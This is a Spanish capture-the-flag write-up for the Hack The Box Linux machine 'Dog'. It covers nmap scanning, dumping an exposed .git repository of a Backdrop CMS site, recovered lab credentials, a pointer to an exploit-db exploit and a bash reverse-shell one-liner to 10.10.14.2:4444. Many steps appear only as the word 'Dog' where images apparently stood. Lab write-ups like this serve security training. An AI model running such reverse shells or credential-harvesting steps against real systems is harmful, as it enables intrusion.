$

Dog

2025-05-25 · #ctf#hackthebox#linux#web

Dog
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Linux Easy 08 Marzo 2025 FisMatHack

Escaneo de puertos

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 17:25 -03
Initiating SYN Stealth Scan at 17:25
Scanning 10.10.11.58 [65535 ports]
Discovered open port 80/tcp on 10.10.11.58
Discovered open port 22/tcp on 10.10.11.58
Completed SYN Stealth Scan at 17:25, 20.20s elapsed (65535 total ports)
Nmap scan report for 10.10.11.58
Host is up, received user-set (0.24s latency).
Scanned at 2025-05-25 17:25:13 -03 for 20s
Not shown: 60942 closed tcp ports (reset), 4591 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
           Raw packets sent: 97708 (4.299MB) | Rcvd: 61583 (2.463MB)

Enumeración de versión y servicio

nmap -sCV -p22,80 -oN servicesScan 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 17:25 -03
Nmap scan report for 10.10.11.58 (10.10.11.58)
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.10 seconds

Explotación inicial

HTTP (80)

Backdrop CMS es un sistema de gestión de contenido de código abierto, desarrollado por la comunidad, escrito en PHP y licenciado bajo la Licencia Pública General GNU

Dog

python3 git_dumper.py http://10.10.11.58:80/.git/ dog_htb

Dog

tiffany@dog.htb:BackDropJ2024DS2024

Dog

Dog

https://www.exploit-db.com/exploits/52021

Debe generarse un tar y no un zip.

Dog

Lanzamos una reverse shell.

bash -c "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"

Dog

Reutilización de contraseña de tifanny.

Dog

Leemos la flag de user

Dog

Escalación de privilegios

Dog

Dog

PoC

Dog

Dog

Leemos la flag de root

Dog